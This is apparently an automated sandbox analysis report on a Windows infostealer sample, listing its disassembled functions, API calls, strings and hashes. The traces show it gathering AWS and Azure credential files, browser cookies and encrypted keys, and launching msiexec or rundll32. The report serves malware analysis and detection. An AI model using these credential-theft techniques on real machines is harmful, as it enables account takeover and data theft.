                                • Instruction Fuzzy Hash: F8E1E771910108ABCF18EBA4DDA6FEFB7B9AF14300F4451B9F11676191EE306A89CF61
                                Function 00EB84B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                • RegOpenKeyExA.ADVAPI32(00000000,01BFC4C8,00000000,00020019,00000000,00EC05BE), ref: 00EB8534
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00EB85B6
                                • wsprintfA.USER32 ref: 00EB85E9
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00EB860B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00EB861C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00EB8629
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 3246050789-3278919252
                                • Opcode ID: 12def01459e266ffa55aa1b32fc92e4dea5ce9a827336e1f253dafaa6df8ab5f
                                • Instruction ID: 43d0484471bddf9d2b316c68b97252f63d04772b37d53f1420629f9f5dcdcd8b
                                • Opcode Fuzzy Hash: 12def01459e266ffa55aa1b32fc92e4dea5ce9a827336e1f253dafaa6df8ab5f
                                • Instruction Fuzzy Hash: 17810B71911118ABDB28DB54CD95FEAB7B8BF48704F1492E9E119B6280DF706F84CFA0
                                Function 00EB91A0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 184COMMON
                                Download Yara Rule
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00EB91FC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateGlobalStream
                                • String ID: `d$`d$image/jpeg
                                • API String ID: 2244384528-3402243820
                                • Opcode ID: 647e95faa5f57377e68cb28d3000940deef02f3f59dbe951a209f139e508d5d5
                                • Instruction ID: e76a9d72b8ae9767978935b09556d5adab06d60b1e7acd5346c07fbe703c993a
                                • Opcode Fuzzy Hash: 647e95faa5f57377e68cb28d3000940deef02f3f59dbe951a209f139e508d5d5
                                • Instruction Fuzzy Hash: 0971F175910208ABDB14DFE4DC89FDEB7B9BF48300F108558F625B7294DB34A944CB60
                                Function 00EB4FC0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EB8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EB8F9B
                                • lstrcat.KERNEL32(?,00000000), ref: 00EB5000
                                • lstrcat.KERNEL32(?,\.azure\), ref: 00EB501D
                                  • Part of subcall function 00EB4B60: wsprintfA.USER32 ref: 00EB4B7C
                                  • Part of subcall function 00EB4B60: FindFirstFileA.KERNEL32(?,?), ref: 00EB4B93
                                • lstrcat.KERNEL32(?,00000000), ref: 00EB508C
                                • lstrcat.KERNEL32(?,\.aws\), ref: 00EB50A9
                                  • Part of subcall function 00EB4B60: StrCmpCA.SHLWAPI(?,00EC0FC4), ref: 00EB4BC1
                                  • Part of subcall function 00EB4B60: StrCmpCA.SHLWAPI(?,00EC0FC8), ref: 00EB4BD7
                                  • Part of subcall function 00EB4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00EB4DCD
                                  • Part of subcall function 00EB4B60: FindClose.KERNEL32(000000FF), ref: 00EB4DE2
                                • lstrcat.KERNEL32(?,00000000), ref: 00EB5118
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00EB5135
                                  • Part of subcall function 00EB4B60: wsprintfA.USER32 ref: 00EB4C00
                                  • Part of subcall function 00EB4B60: StrCmpCA.SHLWAPI(?,00EC08D3), ref: 00EB4C15
                                  • Part of subcall function 00EB4B60: wsprintfA.USER32 ref: 00EB4C32
                                  • Part of subcall function 00EB4B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00EB4C6E
                                  • Part of subcall function 00EB4B60: lstrcat.KERNEL32(?,01BFF750), ref: 00EB4C9A
                                  • Part of subcall function 00EB4B60: lstrcat.KERNEL32(?,00EC0FE0), ref: 00EB4CAC
                                  • Part of subcall function 00EB4B60: lstrcat.KERNEL32(?,?), ref: 00EB4CC0
                                  • Part of subcall function 00EB4B60: lstrcat.KERNEL32(?,00EC0FE4), ref: 00EB4CD2
                                  • Part of subcall function 00EB4B60: lstrcat.KERNEL32(?,?), ref: 00EB4CE6
                                  • Part of subcall function 00EB4B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00EB4CFC
                                  • Part of subcall function 00EB4B60: DeleteFileA.KERNEL32(?), ref: 00EB4D81
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 949356159-974132213
                                • Opcode ID: 0c3f7e583821b424cc5a5eb138238ce47ba36deb2170b03a584f687e5923be2a
                                • Instruction ID: 5e8d2616522867eeabf728b959d373fa7c9007fcb44876a6acf1036a7d65aa3f
                                • Opcode Fuzzy Hash: 0c3f7e583821b424cc5a5eb138238ce47ba36deb2170b03a584f687e5923be2a
                                • Instruction Fuzzy Hash: B541F8BAA4030867DF24E770ED87FDD73785B55700F0054A8B255751C2EEB5A7C88B92
                                Function 00EB3080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00EB3415
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00EB35AD
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00EB373A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell$lstrcpy
                                • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                • API String ID: 2507796910-3625054190
                                • Opcode ID: 4aeaf9404637ebea17ff7bbeb6fd7602c752b6b780b989b080de83534ec4ba7f
                                • Instruction ID: 5518dc7ce89b5a84b1cb09b8b2dc835de47e7955c215a6a2d2b9c879364c94db
                                • Opcode Fuzzy Hash: 4aeaf9404637ebea17ff7bbeb6fd7602c752b6b780b989b080de83534ec4ba7f
                                • Instruction Fuzzy Hash: 68120E71910118AACF18EBA0DDA2FEFB7B9AF14300F4855B9E11676191EF342B49CF61
                                Function 00EA9BE0 Relevance: 19.6, APIs: 8, Strings: 5, Instructions: 146stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EA9A50: InternetOpenA.WININET(00EC0AF6,00000001,00000000,00000000,00000000), ref: 00EA9A6A
                                • lstrcat.KERNEL32(?,cookies), ref: 00EA9CAF
                                • lstrcat.KERNEL32(?,00EC12C4), ref: 00EA9CC1
                                • lstrcat.KERNEL32(?,?), ref: 00EA9CD5
                                • lstrcat.KERNEL32(?,00EC12C8), ref: 00EA9CE7
                                • lstrcat.KERNEL32(?,?), ref: 00EA9CFB
                                • lstrcat.KERNEL32(?,.txt), ref: 00EA9D0D
                                • lstrlen.KERNEL32(00000000), ref: 00EA9D17
                                • lstrlen.KERNEL32(00000000), ref: 00EA9D26
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                • API String ID: 3174675846-3542011879
                                • Opcode ID: 8d2059200e5b008cabc469b170bd97890724cbb47b107798c2f7c1997acf54b9
                                • Instruction ID: 2e1546502eeba4f4a5f281726872433ff57d0d4c0edd3b76e5292f40bad9d3ed
                                • Opcode Fuzzy Hash: 8d2059200e5b008cabc469b170bd97890724cbb47b107798c2f7c1997acf54b9
                                • Instruction Fuzzy Hash: 0951A0B5D10208ABDB14EBE0DC95FEE7778AB05301F0055A8F215BB191EF71AA89CF61
                                Function 00EB5510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                  • Part of subcall function 00EA62D0: InternetOpenA.WININET(00EC0DFF,00000001,00000000,00000000,00000000), ref: 00EA6331
                                  • Part of subcall function 00EA62D0: StrCmpCA.SHLWAPI(?,01BFF7D0), ref: 00EA6353
                                  • Part of subcall function 00EA62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EA6385
                                  • Part of subcall function 00EA62D0: HttpOpenRequestA.WININET(00000000,GET,?,01BFF220,00000000,00000000,00400100,00000000), ref: 00EA63D5
                                  • Part of subcall function 00EA62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EA640F
                                  • Part of subcall function 00EA62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EA6421
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EB5568
                                • lstrlen.KERNEL32(00000000), ref: 00EB557F
                                  • Part of subcall function 00EB8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EB8FE2
                                • StrStrA.SHLWAPI(00000000,00000000), ref: 00EB55B4
                                • lstrlen.KERNEL32(00000000), ref: 00EB55D3
                                • lstrlen.KERNEL32(00000000), ref: 00EB55FE
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 3240024479-1526165396
                                • Opcode ID: ddde8a4662bf9ddcfd553e0d7154a11ce23679887dc418795f9becc061be8a60
                                • Instruction ID: 409a07b50a1677f009d1c4e02515cf0173c999e521081058b7acfadc305fd273
                                • Opcode Fuzzy Hash: ddde8a4662bf9ddcfd553e0d7154a11ce23679887dc418795f9becc061be8a60
                                • Instruction Fuzzy Hash: 4A51D930A10108ABCF18FF60D9A7BEE77B9AF15340F546478E4167A592EB306B45CB62
                                Function 00EB1520 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 7e2396d419d554e163d353816a1365e9204311d60181ecc14e527185196d601d
                                • Instruction ID: f62cbf6b1840e345701933592a2fedac43b2a07b45449066687df5277224f892
                                • Opcode Fuzzy Hash: 7e2396d419d554e163d353816a1365e9204311d60181ecc14e527185196d601d
                                • Instruction Fuzzy Hash: 47C195B5900219ABCF18EF60DC9AFEF73B9AF54304F0455E8E51977242DA70AA84CF91
                                Function 00EB44D0 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EB8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EB8F9B
                                • lstrcat.KERNEL32(?,00000000), ref: 00EB453C
                                • lstrcat.KERNEL32(?,01BFF130), ref: 00EB455B
                                • lstrcat.KERNEL32(?,?), ref: 00EB456F
                                • lstrcat.KERNEL32(?,01BFE4B0), ref: 00EB4583
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EB8F20: GetFileAttributesA.KERNEL32(00000000,?,00EA1B94,?,?,00EC577C,?,?,00EC0E22), ref: 00EB8F2F
                                  • Part of subcall function 00EAA430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00EAA489
                                  • Part of subcall function 00EAA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EAA13C
                                  • Part of subcall function 00EAA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EAA161
                                  • Part of subcall function 00EAA110: LocalAlloc.KERNEL32(00000040,?), ref: 00EAA181
                                  • Part of subcall function 00EAA110: ReadFile.KERNEL32(000000FF,?,00000000,00EA148F,00000000), ref: 00EAA1AA
                                  • Part of subcall function 00EAA110: LocalFree.KERNEL32(00EA148F), ref: 00EAA1E0
                                  • Part of subcall function 00EAA110: CloseHandle.KERNEL32(000000FF), ref: 00EAA1EA
                                  • Part of subcall function 00EB9550: GlobalAlloc.KERNEL32(00000000,-F,00EB462D), ref: 00EB9563
                                • StrStrA.SHLWAPI(?,01BFF148), ref: 00EB4643
                                • GlobalFree.KERNEL32(?), ref: 00EB4762
                                  • Part of subcall function 00EAA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00EAA23F
                                  • Part of subcall function 00EAA210: LocalAlloc.KERNEL32(00000040,?,?,?,00EA4F3E,00000000,?), ref: 00EAA251
                                  • Part of subcall function 00EAA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00EAA27A
                                  • Part of subcall function 00EAA210: LocalFree.KERNEL32(?,?,?,?,00EA4F3E,00000000,?), ref: 00EAA28F
                                • lstrcat.KERNEL32(?,00000000), ref: 00EB46F3
                                • StrCmpCA.SHLWAPI(?,00EC08D2), ref: 00EB4710
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00EB4722
                                • lstrcat.KERNEL32(00000000,?), ref: 00EB4735
                                • lstrcat.KERNEL32(00000000,00EC0FA0), ref: 00EB4744
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                • String ID:
                                • API String ID: 3541710228-0
                                • Opcode ID: 25df24af2d552492579c68befaa41cfc04adf763297cd7a0671c5cde89122ccc
                                • Instruction ID: 17ec5f60523a68cbe120816c1ed1c8638c6bea1f7c6dd2e6339f2026b4ed23e4
                                • Opcode Fuzzy Hash: 25df24af2d552492579c68befaa41cfc04adf763297cd7a0671c5cde89122ccc
                                • Instruction Fuzzy Hash: 637188B6900218ABDF14EBA0DD99FDE73BDAB48300F0455A8F61566185EF34EB44CB61
                                Function 00EA1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                Download Yara Rule
                                APIs
